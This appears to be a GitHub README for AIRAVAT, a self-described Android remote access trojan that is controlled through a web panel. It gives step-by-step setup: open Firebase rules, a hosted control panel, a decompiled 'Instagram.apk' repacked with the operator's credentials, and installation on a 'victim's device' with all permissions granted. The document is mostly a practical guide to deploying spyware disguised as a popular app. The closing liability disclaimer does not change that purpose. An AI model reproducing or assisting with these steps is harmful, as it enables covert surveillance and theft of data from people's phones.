Th30neAnd0nly / AIRAVAT

A multifunctional Android RAT with GUI based Web Panel without port forwarding.
MIT License
944 stars 369 forks source link
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A multifunctional Android RAT with GUI based Web Panel without port forwarding.



How to Build

Firebase Setup

  1. Create an Firebase Account and afterwords create a new project with any name.
  2. Enable Firebase Database and Firebase Storage.
  3. In Firebase Database Click on the rules and set .read and .write to true
    •   {
         "rules": {
                 ".read": "true",
                 ".write": "true"
  4. In Firebase Storage allow reads and writes for all paths.
    • rules_version = '2';
      service {
      match /b/{bucket}/o {
          match /{allPaths=**} {
             allow read, write 
  5. Now Go to project overview and create an Android App and download the google-services.json file.
  6. Also create a web app and copy the config of webapp.

    Panel Setup

  7. You can use Github Pages , Firebase Hosting or any Hosting Website (except 000webhost) for hosting the panel.
  8. Open index.html File and from line number 16 replace the config with your web app config which you have created on Step 6.
  9. Save the file , Your Panel Setup is completed.

    Android RAT

  10. Download Instagram.apk
  11. Decompile it using any Decompiler recommend above.
  12. Now open res/values/strings.xml file.
  13. Replace values of firebase_database_url , google_api_key , google_app_id , google_storage_bucket , project_id with your Firebase Account using google-services.json file which you have downloaded on step 5
    • Example
      <string name="firebase_database_url"></string>
      <string name="google_api_key">your_api_key</string>
      <string name="google_app_id">your_app_id</string>
      <string name="google_storage_bucket">your_storage_bucket_url</string>
      <string name="project_id">project_id</string>
  14. Now compile the code with appt2.
  15. Install the app in victim's device and give all the permissions after that the connection will show up in web panel.

    Tutorial Videos

    1. To be updated...


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The use of the AIRAVAT is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Please read LICENSE.